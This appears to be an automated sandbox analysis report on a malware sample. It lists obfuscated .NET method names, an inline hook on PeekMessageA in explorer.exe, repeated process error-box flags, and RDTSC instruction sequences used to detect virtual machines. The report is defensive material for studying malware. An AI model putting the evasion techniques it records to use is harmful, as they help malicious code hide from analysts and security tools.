Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, gwuolNieyyZJ4Se9Qu4.cs	High entropy of concatenated method names: 'RVlJ6D4uMX', 'qXiJ7vWZMu', 'anhJNQgZGP', 'ufEJUClyuv', 'QabJWEnVo6', 'CyLJPkJovL', 'bmwJX2uSTc', 'uGeJ10X9iL', 'kbJJvximeb', 'qq3JTBqry3'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, JGEvZAxvPBk7be5uHY.cs	High entropy of concatenated method names: 'vMw51FnSEL', 'J6K5vtR4Dd', 'LaQ5oGZ8DZ', 'Yp05Ec5mny', 'RiM5K32c95', 'nbX5RavOIu', 'M0K5OLMFR2', 'VU45IusrvW', 'Lky5aWqnpi', 'JXD5gnwQWr'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, QqrAThnRL5Zxw4EbaO.cs	High entropy of concatenated method names: 'QEiABbbK0e', 'I5lA3T5Jkn', 'ToString', 'W15ApOZOHW', 'SkJAd5FgR6', 'PSOAymm2PH', 'I26AtMRpYw', 'eFeAlXH6VK', 'HVKAQVICHj', 'mANAGajSBT'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, Eao4Zdz7jKD7O9JiUQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pACJ5LBatt', 'DuJJrMaffp', 'IZXJ2Dp8jF', 'HASJAkB8Mf', 'hseJYEMmRY', 'o26JJhqOLV', 'IodJcrRJDu'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, cHORWud2lBUABnYAU8.cs	High entropy of concatenated method names: 'Dispose', 'Joai0ZXNC1', 'halsEyo9bB', 'RHejj6yZkV', 'IwtiHCGf5n', 'sDviz8kgt0', 'ProcessDialogKey', 'KATseaD8oe', 'YjFsia8soD', 'gp8ssai1S5'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, WIUfHcD8WWKeWIy9Mj.cs	High entropy of concatenated method names: 'JTbra4RlJs', 'z6Br9rRodt', 'qN5rDufTC8', 'yFCrjRG19Y', 'IBxrEdn7n0', 'pvTrwjsPDb', 'gaKrKVYxHH', 'K5orR4crMg', 'w3Frufxfhe', 'bGsrOwFqWW'
Source: 0.2.z2______________________________.exe.3a60a00.14.raw.unpack, Ni1S5kHhuk46Mnb7Vr.cs	High entropy of concatenated method names: 'UrPJi5kXBr', 'tUWJZI9nsq', 'UoWJSMYYxt', 'ydeJpxkyIB', 'sEBJd4vfQ0', 'F52JtS318A', 'iBLJljHAOW', 'ok0Y4veeMS', 'KA6YkvpjJe', 'KUjY0ymyEb'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, G8OFA5sukF1vCVi9WC.cs	High entropy of concatenated method names: 'vTMNW5ebh', 'TN2U90aOa', 'TX0PE3SCd', 'rebXANQHg', 'pPQvedBtH', 'XQgTBaXko', 'Su2luaWn2Bx8rveNXE', 'f29IWH5bUZW32ED4ed', 'X9bYRG4Kh', 'wUHcg9miH'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, wQVt41GoeK5ndA2RJ5.cs	High entropy of concatenated method names: 'BiTZCK5C1q', 's5rZpkOJhO', 'J77ZdI8eB3', 'b5HZy4t0cC', 'BOTZt7S1Sw', 'CiZZlxA3Gj', 'uFQZQbdfNM', 'Lg9ZGe6njv', 'sabZ8VWEOl', 'vuhZBlopaQ'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, FaD8oe00jFa8soDdp8.cs	High entropy of concatenated method names: 'gkhYoUYk1l', 'nyfYEspc6u', 'N0FYwW4o59', 'O8yYKSgQTC', 'oAPYDEi9Fk', 'dG2YRZE33b', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, d5r1LH1x0hBaCgY5CD.cs	High entropy of concatenated method names: 'HxadDFgY8K', 'TTGdjptJr4', 'mSbdMMlXwZ', 'wF3dnFZ4hr', 'yfrdFiFiiK', 'J9ddV94xup', 'EV6d4fi3gd', 'b1TdkFgBrm', 'sP7d0cKZ2o', 'otgdHTrFF7'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, d2y1YOqfRGIC0uhywc.cs	High entropy of concatenated method names: 'xcpQ6wgQAQ', 'hedQ7rXY0P', 'ykpQNYCRXd', 'eYJQU7n54r', 'biEQWicZjn', 'cXqQPRtldT', 'bMZQXsJJVk', 'afsQ1dvmZH', 'HlkQvX0h9H', 'gLlQTCkslH'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, mVPqaGvmpIst4hN5Mn.cs	High entropy of concatenated method names: 'P5MyU0mw1Z', 'qJByPdeSdh', 'cIvy117aPe', 'y3tyv4wPCI', 'iyPyrU9GTF', 'EJYy2vSJy2', 'LTpyAQTnh9', 'Ji3yYT1NBU', 'kssyJPIXSw', 'Gg7ycH2vJv'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, U2r9OASa6ZcD1gNPjc.cs	High entropy of concatenated method names: 'LNSiQ5r1LH', 'Q0hiGBaCgY', 'kmpiBIst4h', 'z5Mi3nPAAd', 'Vv0iryuLX1', 'LXfi2yLuTk', 'iQTy38RgrIJShb50vc', 'TkgAKZiaABsEKWdo1G', 'hNAiidwZP5', 'qMEiZVHW8c'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, CAAdpkTVgrUfVVv0yu.cs	High entropy of concatenated method names: 'B3ntWYfHkn', 'd7TtXaIt9d', 't3Cyw8WWkQ', 'dLvyKJ9qIf', 'snhyRssUXR', 'IIbyu8Epwe', 'sEFyOUtjWf', 'f4wyISloxP', 'UNJyqstaTj', 'xQMyasCsAf'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, keZjQGOi8rMWq63Y8X.cs	High entropy of concatenated method names: 'hiCQpjVNUD', 'yjQQyiYuoT', 'v4sQl4BMCE', 'qdYlHOlSuq', 'BpklzQxFef', 'Li0QeTMySl', 'UqBQiy81Ec', 'GLZQsm1y8f', 'GN2QZm7rOu', 'V8hQSMoAqW'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, ynFQCcMOTX8D5OZUNM.cs	High entropy of concatenated method names: 'ToString', 'itD2gtK6SG', 'rWI2EV1Khr', 'k012wlUpxp', 'Rgx2KkIb23', 'g3H2R9kxso', 'TqS2uaHR1e', 'A3k2O8A6J0', 'DQd2I9twmW', 'sJo2qeKVQg'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, ItCGf5knJDv8kgt0OA.cs	High entropy of concatenated method names: 'mEcYp7yjjc', 'jPfYd1GUZy', 'T9gYykK1XZ', 'CCNYtYTwKN', 'wT3YlONy3w', 'SmsYQgUmeX', 'gZTYGiwRKG', 'At0Y8y85UT', 'hAPYBLCdtK', 'SCEY3LsTxY'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, DuogO1VFcWjFnVhAIv.cs	High entropy of concatenated method names: 'PdZAkPxEeq', 'zJ5AHiZQiU', 'uOYYeqivm7', 'F3iYi71KeU', 'rwqAgDqikS', 'vpYA966JeD', 'LeIAxKG9D2', 'u21ADqSuLS', 'kG1AjoSHvq', 'JjkAMXvKTD'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, uX1IXfoyLuTkBo2Eop.cs	High entropy of concatenated method names: 'dUDlCLtgW6', 'lNLldBwkjW', 'xGalt1NFnO', 'vtElQiK1HT', 'Y0QlGjQyA0', 'snwtFg3vBG', 'zBRtVTxOg7', 'RfEt4XidPh', 'm2vtkoPZ0N', 'jRnt09d5f4'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, gwuolNieyyZJ4Se9Qu4.cs	High entropy of concatenated method names: 'RVlJ6D4uMX', 'qXiJ7vWZMu', 'anhJNQgZGP', 'ufEJUClyuv', 'QabJWEnVo6', 'CyLJPkJovL', 'bmwJX2uSTc', 'uGeJ10X9iL', 'kbJJvximeb', 'qq3JTBqry3'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, JGEvZAxvPBk7be5uHY.cs	High entropy of concatenated method names: 'vMw51FnSEL', 'J6K5vtR4Dd', 'LaQ5oGZ8DZ', 'Yp05Ec5mny', 'RiM5K32c95', 'nbX5RavOIu', 'M0K5OLMFR2', 'VU45IusrvW', 'Lky5aWqnpi', 'JXD5gnwQWr'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, QqrAThnRL5Zxw4EbaO.cs	High entropy of concatenated method names: 'QEiABbbK0e', 'I5lA3T5Jkn', 'ToString', 'W15ApOZOHW', 'SkJAd5FgR6', 'PSOAymm2PH', 'I26AtMRpYw', 'eFeAlXH6VK', 'HVKAQVICHj', 'mANAGajSBT'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, Eao4Zdz7jKD7O9JiUQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pACJ5LBatt', 'DuJJrMaffp', 'IZXJ2Dp8jF', 'HASJAkB8Mf', 'hseJYEMmRY', 'o26JJhqOLV', 'IodJcrRJDu'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, cHORWud2lBUABnYAU8.cs	High entropy of concatenated method names: 'Dispose', 'Joai0ZXNC1', 'halsEyo9bB', 'RHejj6yZkV', 'IwtiHCGf5n', 'sDviz8kgt0', 'ProcessDialogKey', 'KATseaD8oe', 'YjFsia8soD', 'gp8ssai1S5'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, WIUfHcD8WWKeWIy9Mj.cs	High entropy of concatenated method names: 'JTbra4RlJs', 'z6Br9rRodt', 'qN5rDufTC8', 'yFCrjRG19Y', 'IBxrEdn7n0', 'pvTrwjsPDb', 'gaKrKVYxHH', 'K5orR4crMg', 'w3Frufxfhe', 'bGsrOwFqWW'
Source: 0.2.z2______________________________.exe.39f0be0.13.raw.unpack, Ni1S5kHhuk46Mnb7Vr.cs	High entropy of concatenated method names: 'UrPJi5kXBr', 'tUWJZI9nsq', 'UoWJSMYYxt', 'ydeJpxkyIB', 'sEBJd4vfQ0', 'F52JtS318A', 'iBLJljHAOW', 'ok0Y4veeMS', 'KA6YkvpjJe', 'KUjY0ymyEb'

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE

Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: z2______________________________.exe PID: 7496, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000CC9904 second address: 0000000000CC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000000CC9B6E second address: 0000000000CC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

